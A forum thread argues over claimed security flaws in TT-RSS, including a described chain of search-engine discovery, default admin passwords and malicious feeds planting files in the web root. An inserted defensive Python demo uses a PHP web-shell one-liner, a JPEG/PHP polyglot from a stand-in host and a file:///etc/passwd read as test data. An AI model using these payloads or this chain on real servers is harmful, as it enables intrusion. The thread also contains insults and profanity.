Security issues? (from r/selfhosted)

i think we would be better off letting this drop. the “security issues” were literal FUD, the guy is not going to come back, in general it seems that nobody cares, so there’s nothing left to discuss.

Regarding hypocrisy, the code is bad. That’s not insulting or attacking a person, that’s attacking bad code. However, rather than engage this weird little echo chamber, I’ve started on a complete overhaul using a fork. Again, not sure if this is clear or not: Don’t attack the person, attack the product.

As for the security issues, while reading through the code I’ve only found one glaring issue (so far) in the code and another in the implementation. In the code, the pull on a feed will parse and blindly accept any src attribute of an image element and download the contents into the local filesystem. While that normally wouldn’t be a problem, it’s within the document root path and it’s not being blocked explicitly by a mod_rewrite rule or a directory block from .htaccess. The filenames aren’t even randomized, it’s a plain SHA1 if I remember correctly.

In the implementation, the default robots.txt rules allow for the servers to be indexed and about 20% of users are using the default admin password. This shouldn’t have been possible in the first place, but what is done is done.

Those two combined add a big vector for attack. You can do a quick search on Google for the content of a login page to find installations in the wild, about 20% of those you can use the default admin login, and from there set it to a feed of your own creation and have the thing go wild downloading any file in a src attribute onto their server, regardless of content.

Regarding the Christmas card, good find! It’s been about 5 years and I still think it’s hilarious. :slight_smile: The fact that you think I’m a hipster makes it all the better (satire done well makes people “eat the onion”). In reality, I’m a right-leaning libertarian father of two who commutes in a crossover… And I live in south Brooklyn, least hip place in NYC right after the whole of Staten Island (which, for the record, shouldn’t even be a borough).
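The pattern argued over in this thread, as an added illustration that is not TT-RSS code and not the poster's: a feed-image cache that writes whatever a feed's `<img src>` points at into a web-served directory under a name derived only from the URL, next to a hardened version of the same loop. Network fetches are replaced by a constructed in-memory table (`FAKE_HTTP`) so it runs offline; the URLs, the `docroot`/`cache_dir` layout and the per-install `secret` are assumptions for the demo.

```python
import hashlib
import hmac
import re
import secrets
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Constructed stand-in for the network so the example runs offline:
# URL -> (Content-Type header, response body). Hosts and paths are hypothetical.
FAKE_HTTP = {
    "https://images.example.org/cat.png": ("image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 64),
    "https://images.example.org/dog.jpg": ("image/jpeg", b"\xff\xd8\xff\xe0" + b"\x00" * 64),
    # Attacker-controlled feed: a PHP file served with an image Content-Type.
    "https://evil.example.net/shell.jpg": ("image/jpeg", b"<?php system($_GET['c']); ?>"),
    # Polyglot: real JPEG magic followed by PHP; passes any magic-byte check.
    "https://evil.example.net/poly.jpg": ("image/jpeg", b"\xff\xd8\xff\xe0" + b"<?php system($_GET['c']); ?>"),
    "file:///etc/passwd": ("text/plain", b"root:x:0:0:root:/root:/bin/sh\n"),
}

def fake_fetch(url):
    """Return (content_type, body) or raise OSError, like a minimal HTTP client."""
    if url not in FAKE_HTTP:
        raise OSError("fetch failed")
    return FAKE_HTTP[url]

IMG_SRC = re.compile(r'<img\b[^>]*\bsrc="([^"]+)"', re.IGNORECASE)

def cache_images_blind(item_html, cache_dir, fetch=fake_fetch):
    """The pattern described in the thread: fetch every src, store it as sha1(url)."""
    stored = []
    for url in IMG_SRC.findall(item_html):
        try:
            _ctype, body = fetch(url)
        except OSError:
            continue
        path = Path(cache_dir) / hashlib.sha1(url.encode()).hexdigest()
        path.write_bytes(body)
        stored.append(path)
    return stored

IMAGE_MAGIC = [(b"\x89PNG\r\n\x1a\n", ".png"), (b"\xff\xd8\xff", ".jpg"),
               (b"GIF87a", ".gif"), (b"GIF89a", ".gif")]

def sniff_image_ext(body):
    """Extension from the leading bytes, or None if they are not a known image header."""
    for magic, ext in IMAGE_MAGIC:
        if body.startswith(magic):
            return ext
    return None

def is_inside(child, parent):
    child, parent = Path(child).resolve(), Path(parent).resolve()
    return parent == child or parent in child.parents

def cache_images_hardened(item_html, cache_dir, docroot, secret, fetch=fake_fetch, max_bytes=5_000_000):
    """Hardened version of the same loop (assumed design, not TT-RSS's).

    The decisive control is refusing a cache directory under the served
    document root, so nothing written here can be requested or executed via
    the web server; the other checks only shrink what gets written at all."""
    if is_inside(cache_dir, docroot):
        raise ValueError("image cache must live outside the served document root")
    stored = []
    for url in IMG_SRC.findall(item_html):
        if urlparse(url).scheme not in ("http", "https"):
            continue  # no file://, data:, ftp:, ...
        try:
            _ctype, body = fetch(url)
        except OSError:
            continue
        if len(body) > max_bytes:
            continue
        ext = sniff_image_ext(body)  # trust the bytes, never the Content-Type header
        if ext is None:
            continue
        # Keyed name: a per-install secret makes the stored path unguessable from the URL.
        name = hmac.new(secret, url.encode(), hashlib.sha256).hexdigest() + ext
        path = Path(cache_dir) / name
        path.write_bytes(body)
        stored.append(path)
    return stored

# Constructed feed item mixing benign and hostile image references.
FEED_ITEM = ('<p>news</p><img src="https://images.example.org/cat.png">'
             '<img src="https://images.example.org/dog.jpg">'
             '<img src="https://evil.example.net/shell.jpg">'
             '<img src="https://evil.example.net/poly.jpg">'
             '<img src="file:///etc/passwd">')

def demo():
    """Run both versions in temp dirs.

    Returns (files written blindly, whether the in-docroot cache was refused,
    files written by the hardened loop, their extensions)."""
    with tempfile.TemporaryDirectory() as root:
        docroot = Path(root) / "htdocs"
        (docroot / "cache").mkdir(parents=True)
        outside = Path(root) / "cache-outside"
        outside.mkdir()
        blind = cache_images_blind(FEED_ITEM, docroot / "cache")
        try:
            cache_images_hardened(FEED_ITEM, docroot / "cache", docroot, b"k")
            refused = False
        except ValueError:
            refused = True
        hardened = cache_images_hardened(FEED_ITEM, outside, docroot, secrets.token_bytes(32))
        return len(blind), refused, len(hardened), sorted(p.suffix for p in hardened)

if __name__ == "__main__":
    print(demo())
```

The polyglot entry is the point of the example: the hardened loop still stores `poly.jpg`, because magic-byte sniffing (and a Content-Type check) cannot tell a JPEG from a JPEG-prefixed PHP file. What stops it from being executed is where the file lands and whether the web server will serve or run anything from that directory, which is the server-hardening question the rest of the thread argues about; the keyed filename only removes the easy guess of where the file ended up. The search-engine and default-credential steps from the post are not reproduced here.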

welcome back!

are we going to see the exploit poc or

The robots file is not included with TT-RSS because it’s not a part of the application. That is upon the person managing the server.

Of TT-RSS users or every user everywhere? Please clarify. If this is 20% of TT-RSS users please provide a source. Also, again, this is not within the scope of TT-RSS because the end user should be responsible and change their password. TT-RSS has no control over whether users set easy to guess passwords.

Further to this, TT-RSS provides authentication by password (internal or external) and/or certificates, two-factor authentication, and application-specific passwords. All of these are modern security measures that are well-regarded in the industry. We can see larger corporations (e.g. Apple, Microsoft, GitHub, Google, Amazon, etc.) that need to have strong user authentication all have the same practices. This is an accepted implementation for securing accounts.

Your comment here is not entirely clear, but I guess you’re saying that because TT-RSS stores a file on the file system there’s a problem? The software has to save information to work. If you’re talking about allowing access to the file(s) directly through an HTTP request because it’s stored within the path that is allowed to be served by the HTTP server, again, that is upon the person managing the server. TT-RSS used to include .htaccess files but they were removed specifically because not everyone uses Apache and the onus is really on the person managing the server to harden their server.

It really sounds like your issue is more with Apache. :man_shrugging:

Do you have a real proof-of-concept to show us? What you’ve described above would basically do nothing with most default installations.

Who’s the eggbot think he is?

It appears to be fine to insult people if it’s masquerading as sarcasm? Please…

But let’s engage with the code. Others have asked for POC of attacks, so I won’t. How would you make the code better? What specific problems are there in the code that require a re-write? Why would supporting more databases be beneficial? Are there better ways to do things in PHP that would make Fox’s life easier?

Constructive criticism and humility will get you much respect here…

we even have a wiki page on securing cache directories and it should be linked in the installation guide.

as for default username and password, installer could certainly generate a random password for admin user but this is trying to combat user stupidity with technical means which is a battle that’s impossible to win.

also, tt-rss was never designed as a tool for people who are technically inept on such a level that they don’t change the default admin password (after tt-rss nags them about it on login).

there’s some technical competence implied if you’re installing and using this tool, otherwise you’d be getting your news on facebook anyway.

you now knowing about either of those things (wiki and popup nag) and willfully conflating apache-specific issues with tt-rss tells me everything you need to know about your approach to discussion, as if this wasn’t evident enough from your previous posts.

i’m sure there are better places to spread your vague FUD than this forum, you’ve already had great results on reddit with incompetent people buying and repeating your security meme bullshit wholesale. maybe you should go back to posting there.

if you manage to demonstrate a POC exploit, i’m going to unban you. until then, stop wasting our collective time and fuck off.